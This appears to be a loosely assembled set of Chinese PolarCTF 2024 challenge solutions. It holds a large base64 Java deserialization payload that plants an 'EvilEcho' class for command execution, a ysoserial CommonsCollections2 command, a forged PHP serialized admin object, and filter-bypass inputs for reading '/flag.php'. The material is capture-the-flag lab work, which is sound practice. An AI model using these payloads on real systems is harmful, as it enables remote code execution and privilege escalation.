ieTlQWW1wbFkzUlBkWFJ3ZFhSVGRISmxZVzBNQUNFQWRRd0FkZ0IzQndCNERBQjVBSG9CQUJCcVlYWmhM
MnhoYm1jdlUzUnlhVzVuQndCN0RBQjhBSDhNQUlBQWdRY0FnZ3dBZ3dDRURBQWhBSVVIQUlZTUFJY0FpQUVBRTJwaGRtRXZiR0Z1Wnk5RmVHTmxjSFJwYjI0TUFJa0FJZ0VOZnlRa1FrTkZUQ1FrSkd3a09HSWtTU1JCSkVFa1FTUkJKRUVrUVNSQkpEaGtWaVExWWxja1ZGY2tWU1JtWlNRNFpTUnhKRGs1WVNSWlJDUkRKRWtrWmpGU0pHTXhheVEwTUUwa1l6UWtZbUlrTkRBa1lXUWtTVmdrWVdNa1FpUmhaRUVrZGlSaE1tMGtPRGNrWlRFa1FTUkVKRGt6SkRrNU9ETWtRaVJpTkNSbU55UTNZbXR2SkdZMlptc2taV1FrWTJRa1pHRWtaRFoySkdZMUpHTTVKRGszSkdVNGFpUTVOeVJoWlNRelpTUm1OeVJoTVNRM1pDUmxPV3NrT1dZa1ptRWtaRFFrWW1Va1pqUWtiQ1JrTkNSbFpTUTVNMGswSkZJa1lXTmxKSG9rWmpZNVoxOGtZMlVrWkdVa1ptSWtaR0lrTjJJa09XWWtZMk1rWTJZa1ptWWtabU53SkVRa1l6QldKRGRqSkdFM0pHRXdKR2trT0Rja1ZTUXpZeVE0WXlSak15UTRNaVJ4WlNSTkpIVTRKRGd5SkdFek1pUkhKSElrTTJNa1lUSWtOREFrWXpJa09UQWtPRFJqSkVza09EWnhKRFZqSkdNMkpFb2tXaVE0WmlSallYaE1KR00ySkdVek1qUWtiaVJvSkRreEpHRXhKR05pSkZra09UVWtZekFrT0RVa1l6WWtPVGdrT0dOeEpGb2tWQ1JMSkUxTUpIY2tZVGdrWXpFa09UUWtUVk1rWVdNa2RpUmFKRGsySkUwa05XSkdXamdrTTJJa2RpUmpNeVE1TVNSbE1DUjNKR1l3SkRrd0pGSmtXaVJqTVNSTlppUldOQ1JsTWlRNU5DUTRZeVJrTTJJa04yUkNKRGt3SkhSbEpETmpKSElrWlROcEpFb2tZMllrZFdna1l6RWtZak1rVXlRNVpXTWtTWFVrV1NRNU5pUmxNU1JsWkdZa2RTUTRZallrYkdVa1NYUWtaRGtrWVRNa09XTWtZVEVrZDJGWUpHSmpKRE5tSkRrekpHY2taVEVrWTJVa09EQTJZaVJUSkhRa09XTWtZakIxSkdOa0pETmpKR0ZoT1NRNE5qZ2taVGNrT1Rra1FtOGtZekp3SkZwV0pIUnNaeVF6WXlSalpXY2tZalZVSkdSaEpHVTBjU1JqWkUxekpHUmtKRGxpSkRsakpHVXhKR1JoTkhja1pUSWtOMklrWW1KNkpGTWtNMlFrWm1Fa09EUWtaR1FrWTJVa2JYY2taVGhtSkdSbEpHUTVKRGd5SkdVNVRTUk5KR1ExSkRnNVNXMWFKRGhpSkRsaUpEbGhOU1JySkdWbU1qVWtaRGR0SkZna09ESldKRGcySkhKRkpFTWtPRGNrT0dZa09UbDBKRFZrSkdKakpEaG1KRGRpSkZRa1pqWm9UbU1rWWpNa09EZ2taVFlrWWpZa1l6WWtZekVrT1RGSlVpUmpPRWtrWWpZa1NTUmlNbFVrT1RCdEpEZ3liQ1JZWkNRNE55UnRKRE5pSkVZa1pEbFZhaVE1TnlSbU5DUnBKR016Skdja2RDUmlZaVJpTWlSbE9WWWtPR0VrWVRabWVDUXpaVmx3V25OYUpIWWtZVFFrWW1Fa2IyRWtZMllrWVdNa1kyVWtaRE1rT1dWaEpEVmlKSEVrWVdaTWVpUTVZU1F6WlNSa05TUmhOeVJoTlhNa09EaFFlU1J5SkROalR5UmpOU1JoTlNSbFlVa2taVGdrY3lSaE1DUmFKRGswSkdFMEpEbGtjWFFrWW1Va1kyWWtVU1E0TUZVa1Z5UmxNQ1E0T0NRNE9TUmxZbFJzUkV3a1l6SWtUQ1IzSkRWbEpHTTBTeVIzSkRWbEpHTTJK
SGdrVFNScUpFVmxKR05qVFNSTUpHWTNZeVE0WlNRNU5pUmxNak1rWWpZekpGWWtPV0lrWlRFa2NERWtaR1FrWWpZa00yTWtNMlVrWldJa1l6VWthU1EzWlRJa1l6TWtOV1FrWDNZa1pEaGZKR0ppSkRkamRpUmhabTBrT0dWeUpHVmhKRGd4VjFVa1ltTWtPRFl6SkUwa1lqVWtaVE1rWkdNa1kySnJkSG9rT1RRa1kyTklKR00ySkdVelZDUmhPU1JoWVNRellpUlJWeVJtTVNRellTUmtaU1EyTUZoMEpIUWtPV0VrT1RRa09EVWtPR0UzSkdZeEpGY2tZek1rT1dVa1ptWWthRThrT1RJa00ySWtaRE1rWlRZa1ltTk9KSGh5SkdJeEpHSTRhU1JrWW5Ja1NpUkRKR1UxZG1Ra1RTUmpZaVE0TlNSbE15UmtPU1E1T0NSbFlpUmtZaVJrWlNSaVpTUmhNeVJoTUNRMVkwNGtZMkVrT0RNa09HVWtaVEZ4UnlSak5TUmtZaVJ2SkdReU5TUmhOU1JISkZRa09XVWtPVGNrT0dVa1pqVWtVeVIySkdZMUpHVmxKR2drWmpaeUpEaGtNQ1IySkdNNUpHTmxKR0ZtSkdGaUpEaGhKR0l6ZUNRNE55UmxZU1JoWlNSaE4wWWtXaVJ4SkdSaUpEaGtXU1E1TkNRNU9DUTROSGRWSkdKakpEZzNKR1kzVlNRM1l5UTRNSE1rY1NScEpHUmpKR1JtSkdGbUpHVXlReVEzWTBRa09XUWtWQ1JrTjBra2VpUXpaV0pZY1hja09ESWtPR1VrYUhVa1ZpUmxOeVJtTVRFa1pqRWtSU1I1SkRsbGFWRWtlQ1JsTnlRMVkyUWtNMk1rWXpNa09HTWtkSFVrWTJRa1lqSkVKSFlrSkNSaE9DUm1PQ1JGSkRsbUpHRmhKR1k0SkUwa09XWkxKR1k0UWlSak5VVWtOMk1rZGlSTEpEZGxKRGc1Ympna1pHVWtZVGtrWlRJa2VDUTNZeVJoWkNSbE1pUm9KR1V4SkhjNFptWWtZelFrWXpWQkpHUmtKR0kwSkhwS0pHSmhaaVE1WlZaVGNTUmFKR1JtTWlSaFl5UmlZeVJtTnlSaE1ERTBKR1JqYlhwS0pHRXdKRmtrT1Rod0pFa2tiR3BKSkROa0pHVXpPQ1JrWXlSbU1pUkxKR1UzSkdSaGFITWtaVEpPSkhwcUpHWTBKRE5oSkVNMEpHUm1heVJpT1NSalpVa2taRGdrTTJVa1lqZ2tPVEVrVXlSbU5TUnZKRGt4SkdJd0pEazVWeVEwTUNSak5URnBKRGt6SkdVelVFRWtZVE56SkdNM2JpUmpaU1E0WkNSbFpDUTNaVUVrVEZra1pXTWtPVGtrWXpkbWVDUTRaVTBrWmpNa04yWWtZbVFrYnlSdUpHTXpKRGxoSkdJMkpHRTNKRWtrWldNa05XUWtaREVrWWpsUEpHTTVKR1l3SkRWalZpUm1NeVEzWXlSUVRqVWtZelVrWkRRa1kyUjFVM01rWmpob0pHNGtZalpLSkRrM0pEZGlKRGxrSkdKaEpHTmxKRFZrSkdRM0pHWXdKRGxtSkdNNEpHVTRNU1JtTVNSaFpTUlhKR1kzSkdVd0pIWWtaRGNrWlRNa2RpUTNaaVI1SkU4NWRpUTVZU1F6WWlSa1pTUjJKRGcySkdJMUpHWTNKR013SkdVeEpHUTJKRGhpVkNSbE1TUmtPVWNrWkRKa0pHUTBKR0UxSkRnNUpFSWtkaVJoWkNSa05pUjZKSEpaVENSaE4yWllKRVVrWmpBa1pESWtaVElrT0dJa1ltSWtjelFrZENSMlppUmpOQ1JrTW5ra04ySWtaak14VWlSVlpTUm1OU1I0VVRNa1lqY2tPVElrWldRa09EVWtZMlVrWTJVa1lqRWtUMmNrZVNSalprZ2tWa1lrWWpod0pHRTRKSGd4SkdOaUpHSXpKR001TUNSak1HYzVK
R05rVFRRa00yRWtZMllrWW1KYWJFRWtVU1JKSkdJMFNpUTFaQ1JsTlNRNU9TUk5KRXdrWXpra1pEVWtOMlVrZUNRNVpDUm1NU1JqT0NRNU1tc2tPRFJhSkRka0pHTXhKRGxrWVNSak55UTRZaVJGWkNSa1pTUlJKRGxrVnlSdEpHUXdWek1rSkNSbFppUmxOaVJoTmlRNU1TUlRKRjhrU2lSak15UmlZU1JpWW1Na05XUWtNMk1rWXpJa2J5UktKRGhpSkdaaEpEbGtKRGhoU2xFa1pUUWtheVJtWVNSQ1J5UmtNeVIySkdVM0pHTTJhSE5wVmlSR1VTUTRaaVJqT1ZNMFN5UmxaR2drWXpJa1J5Um1ZU1ExWkNSWEpEZG1KRXdrWXpBa1l6UXpUelJPSkdFM09DUmhaQ1E0WXlSa05pUTJNQ1JqWWxVa1lqQWtlRGtrWmpFa2N5UmhNaVJoTVNScE15UTRORllrWVRJa1lXRWtZV1lrT0RBa1kyUWtaRGhDSkdGaVRDUnNKRlY1SkdVekpFWWtaR1lrWkRNa09UVWtWaVJCSkdRekpHRm1ZVUVrVjJVa1pURWtOREFrVnlSak1TUkVKSG9rWlRGUUpHUTVkVWhaSkdNNEpEZzVKR1kxSkRoamRpUmxOVmtrZFNRM1pIa2tPRFVrUzE5QkpIb2tkU1JpTkNRNE5DUjRKR1l6SkdSaUpHWmxKR1kxSkdna1pqSWtZbUZ0SkRneEpEaGtKR0kzSkdJMkpHTXhKR0pqSkdSa1FpUmlNaVJNVnlSbU9TUmhZU1E0WWlSa1lVSjViaVJpTlNSbE1DUTROaVJFSkdNMEpHb2tkeVJNSkdRM0pIRWtPRFZJSkRoaFNDUlZSRzBrY1NSbE5DUmtNMGdrWVRCd0pEa3pKR2trT1RFa2IwRlNKSG9rZENSa05TUXpZVkpWSkRkbFFrMGtOV0o1SkdVNEpETmhVU1J5SkdKakpHWTRKR2NrWldFa1lqTm9KRWxISkdJeVdISWtheVJsTVNRNE9DUnZkQ1J2U2lSdEpHSmpOSGtrV2xVa1pUSWtZamdrZVhja05XTk9OQ1JaSkhaUFJpUmxOQ1I1SkdWbEpFd2tZV1lrZFNSbU5pUnBKRGt4Skdaa0pHTmlKRGRtUkNSbE15UmtNRFUwUlNRNU5DUjVWbVlrWWpFa1pXRWtkMVlrT0Rja1pEZGtKR0l4TmlRNFluVWtZeklrWlRra1lUQnZKRm9rWTJSbkpGTWtPVEVrWmpNa1pURWtaVFVrWmpra1kyUnpKR1k0SkRrM1VTUTNaU1JoTUNSeUpEaGlKR1kxSkRnelYwUWtVaVJrT0NSUkpETmlUaVJzU21Va1lqa2tVemxZUmlSaU5DUTVZeVJqWVNSaE15UmhNQ1E1WlNSallTUmtNQ1JGSkdZeEpEbGhWMklrZENSWEpHRXlKRXhWSkdVNEpHTTNKRzhrVFNSaE1TUm5OaVJqTWpoRFgyaG5VU1E0WW5Na1lUZ2tZek1rY2lSNUpFY2taVFVrT0dJa2FHZ2tZekFrWHlRNE9DUmxNRGNrZVNSak1TUmxablFrWkRja2JGZ2tPR1VrTTJZa1lqRWtReVEzWmlSaE15UTVNVFVrWVRNa09EbDFZaVJ5Skdna1l6SWtaeVJtTWlSaU9DUTRZU1E1WkNSak1HbzJKRGd5SkdJMUpHSTVkamhOSkRkbFZDUmtOaVE0TjIwa1pEaE9KR0UzZWlSaU5pUllKRE5pSkdNNEpIUWtjQ1E0WWlRNVpDUmtPQ1E0TlRacUpHRXdKQ1FrWWpZa1dTUmxaQ1JqTkNSNFF5UXpaaVJoWWlRME1DUklKR1l4SkVNa1dTUmhNaVJtTUNSbFppUmhOeVExWkNRNU1DUmxNaVJtT1NSTUpHSmlTU1JuSkdFeUpHRTRKRGRsSkdNMUpFUWtZalFrT1RNa2RTUmhOaVI1SkdZMkpEa3dWQ1JoTmlSak9DUWtK
R0V5SkZRa04ySWtkaVJoWmlSb0pHSTRKRFF3ZVhSREpHNGtaV1pCSkdZMEpEWXdKR3g1SkRkaUpEa3dKR1psSkdJM0pIQndKRGt6SkVNa1lXVWtPVEFrWkRBa2VHRWtZbVlrT0RRa09EY2tTeVJrTkNSa1ppUm1PQ1JtWWlSRUpGTWtVeVEwTUNSak5VMUNKRGc1SkRZd0pEa3pKR1F3SkZna1lUUWtTU1JtWW5Na1pXUWtOMlFrWmpCZlp5Um1PV29rYXlSWkpFd2tRU1JCQVFBeFkyOXRMbk4xYmk1dmNtY3VZWEJoWTJobExtSmpaV3d1YVc1MFpYSnVZV3d1ZFhScGJDNURiR0Z6YzB4dllXUmxjZ3dBaWdDTEFRQUpiRzloWkVOc1lYTnpEQUNNQUkwSEFJNE1BSThBa0F3QWN3Q1JBUUFVYW1GMllTOXBieTlUWlhKcFlXeHBlbUZpYkdVQkFBZG1iM0pPWVcxbEFRQWxLRXhxWVhaaEwyeGhibWN2VTNSeWFXNW5PeWxNYW1GMllTOXNZVzVuTDBOc1lYTnpPd0VBRm1kbGRFUmxZMnhoY21Wa1EyOXVjM1J5ZFdOMGIzSUJBRE1vVzB4cVlYWmhMMnhoYm1jdlEyeGhjM003S1V4cVlYWmhMMnhoYm1jdmNtVm1iR1ZqZEM5RGIyNXpkSEoxWTNSdmNqc0JBQjFxWVhaaEwyeGhibWN2Y21WbWJHVmpkQzlEYjI1emRISjFZM1J2Y2dFQUMyNWxkMGx1YzNSaGJtTmxBUUFuS0Z0TWFtRjJZUzlzWVc1bkwwOWlhbVZqZERzcFRHcGhkbUV2YkdGdVp5OVBZbXBsWTNRN0FRQVpLRXhxWVhaaEwybHZMMDkxZEhCMWRGTjBjbVZoYlRzcFZnRUFDM2R5YVhSbFQySnFaV04wQVFBVktFeHFZWFpoTDJ4aGJtY3ZUMkpxWldOME95bFdBUUFRYW1GMllTOXNZVzVuTDFONWMzUmxiUUVBQTI5MWRBRUFGVXhxWVhaaEwybHZMMUJ5YVc1MFUzUnlaV0Z0T3dFQUVHcGhkbUV2ZFhScGJDOUNZWE5sTmpRQkFBcG5aWFJGYm1OdlpHVnlBUUFIUlc1amIyUmxjZ0VBREVsdWJtVnlRMnhoYzNObGN3RUFIQ2dwVEdwaGRtRXZkWFJwYkM5Q1lYTmxOalFrUlc1amIyUmxjanNCQUF0MGIwSjVkR1ZCY25KaGVRRUFCQ2dwVzBJQkFCaHFZWFpoTDNWMGFXd3ZRbUZ6WlRZMEpFVnVZMjlrWlhJQkFBWmxibU52WkdVQkFBWW9XMElwVzBJQkFBVW9XMElwVmdFQUUycGhkbUV2YVc4dlVISnBiblJUZEhKbFlXMEJBQWR3Y21sdWRHeHVBUUFWS0V4cVlYWmhMMnhoYm1jdlUzUnlhVzVuT3lsV0FRQVBjSEpwYm5SVGRHRmphMVJ5WVdObEFRQUlaMlYwUTJ4aGMzTUJBQk1vS1V4cVlYWmhMMnhoYm1jdlEyeGhjM003QVFBSloyVjBUV1YwYUc5a0FRQkFLRXhxWVhaaEwyeGhibWN2VTNSeWFXNW5PMXRNYW1GMllTOXNZVzVuTDBOc1lYTnpPeWxNYW1GMllTOXNZVzVuTDNKbFpteGxZM1F2VFdWMGFHOWtPd0VBR0dwaGRtRXZiR0Z1Wnk5eVpXWnNaV04wTDAxbGRHaHZaQUVBQm1sdWRtOXJaUUVBT1NoTWFtRjJZUzlzWVc1bkwwOWlhbVZqZER0YlRHcGhkbUV2YkdGdVp5OVBZbXBsWTNRN0tVeHFZWFpoTDJ4aGJtY3ZUMkpxWldOME93RUFGQ2dwVEdwaGRtRXZiR0Z1Wnk5UFltcGxZM1E3QUNFQUh3QUlBQUVBSUFBQUFBTUFBUUFoQUNJQUFRQWpBQUFBTHdBQkFBRUFBQUFGS3JjQUFiRUFBQUFDQUNRQUFBQUdBQUVBQUFBWUFDVUFB
QUFNQUFFQUFBQUZBQ1lBSndBQUFBa0FLQUFwQUFFQUl3QUFBUm9BQlFBR0FBQUFXYnNBQWxtM0FBTk1FZ1M0QUFWTkxBTzlBQWEyQUFjRHZRQUl0Z0FKVHJzQUNsbTNBQXM2QkxzQURGa1pCTGNBRFRvRkdRVXR0Z0FPc2dBUHV3QVFXYmdBRVJrRXRnQVN0Z0FUdHdBVXRnQVZwd0FJVFN5MkFCZXhBQUVBQ0FCUUFGTUFGZ0FFQUNRQUFBQXVBQXNBQUFBYUFBZ0FIQUFPQUIwQUhnQWVBQ2NBSHdBeUFDQUFPQUFoQUZBQUpRQlRBQ01BVkFBa0FGZ0FKZ0FsQUFBQVNBQUhBQTRBUWdBcUFDc0FBZ0FlQURJQUxBQXRBQU1BSndBcEFDNEFMd0FFQURJQUhnQXdBREVBQlFCVUFBUUFNZ0F6QUFJQUFBQlpBRFFBTlFBQUFBZ0FVUUEyQURjQUFRQTRBQUFBREFBQkFBNEFRZ0FxQURrQUFnQTZBQUFBRXdBQy93QlRBQUlIQURzSEFEd0FBUWNBUFFRQUFnQStBRDhBQWdBakFBQUF5Z0FHQUFZQUFBQklFaGhORWhtNEFBVUR2UUFHdGdBSEE3MEFDTFlBQ2NBQUFrNHR0Z0FhRWhzRXZRQUdXUU1TRUZPMkFCdzZCQmtFTFFTOUFBaFpBeXhUdGdBZHdBQUdPZ1VaQmJZQUhsZXhBQUFBQXdBa0FBQUFHZ0FHQUFBQUtBQURBQ29BR2dBdEFDNEFNQUJCQURFQVJ3QXlBQ1VBQUFBK0FBWUFBQUJJQUNZQUp3QUFBQUFBU0FCQUFFRUFBUUFEQUVVQVFnQkRBQUlBR2dBdUFFUUFOd0FEQUM0QUdnQkZBRVlBQkFCQkFBY0FSd0FyQUFVQU9BQUFBQXdBQVFCQkFBY0FSd0E1QUFVQVNBQUFBQVFBQVFBV0FBSUFTUUFBQUFJQVNnQitBQUFBQ2dBQkFGNEFXd0I5QUFrPXQADkV2aWxFY2hvLmNsYXNzc3IAPm9yZy5hc3BlY3RqLndlYXZlci50b29scy5jYWNoZS5TaW1wbGVDYWNoZSRTdG9yZWFibGVDYWNoaW5nTWFwO6sCH0tqVloCAANKAApsYXN0U3RvcmVkSQAMc3RvcmluZ1RpbWVyTAAGZm9sZGVycQB%2BAAF4cgARamF2YS51dGlsLkhhc2hNYXAFB9rBwxZg0QMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAAAdwgAAAAQAAAAAHgAAAGZs8rEqgAAAAF0AC4vdXNyL2xpYi9qdm0vamF2YS04LW9wZW5qZGstYW1kNjQvanJlL2NsYXNzZXMv
payload run cmd
/read
.........<same as above>.......
cmd: ls
Connection: keep-alive
obj=rO0ABXNyAAhFdmlsRWNob2turzAL9eh9AgAAeHA%3D
SnakeYaml
500 分 5 Polar币
【2024秋季个人挑战赛】 打c3p0二次反序列化回显
fangyifang
java -jar ysoserial.jar CommonsCollections2 "ls" > d:/ctf/tmp/ls.ser
投喂
100 分 1 Polar币
【2024秋季个人挑战赛】
<?php
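// Local stand-in for the target's User class; the challenge source is not shown
// on this page, so the property names are the ones the write-up assumes.
// The "$" sigils of the published listing were lost in extraction and are
// restored here; the output is the string printed below the listing.
//
// NOTE(review): is_admin is decided by whoever builds the serialized object. A
// server must not read authorization state from a client-supplied
// unserialize() result; it should look the role up from its own session or
// data store.
class User
{
    public $username = "admin";
    public $is_admin = true;
}

$a = new User();
$payload = serialize($a);
echo $payload;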
?>
output:
O:4:"User":2:{s:8:"username";s:5:"admin";s:8:"is_admin";b:1;}
data=data=O:4:”User”:2:{s:8:”username”;s:5:”admin”;s:8:”is_admin”;b:1;}
ezUtil
500 分 5 Polar币
【2024冬季个人挑战赛】
fangyifang
狗黑子的RCE
100 分 1 Polar币
【2024冬季个人挑战赛】
gouheizi2=gougouheiziheizi
?gouheizi1=l\s /
?gouheizi1=c\at /fl\ag.php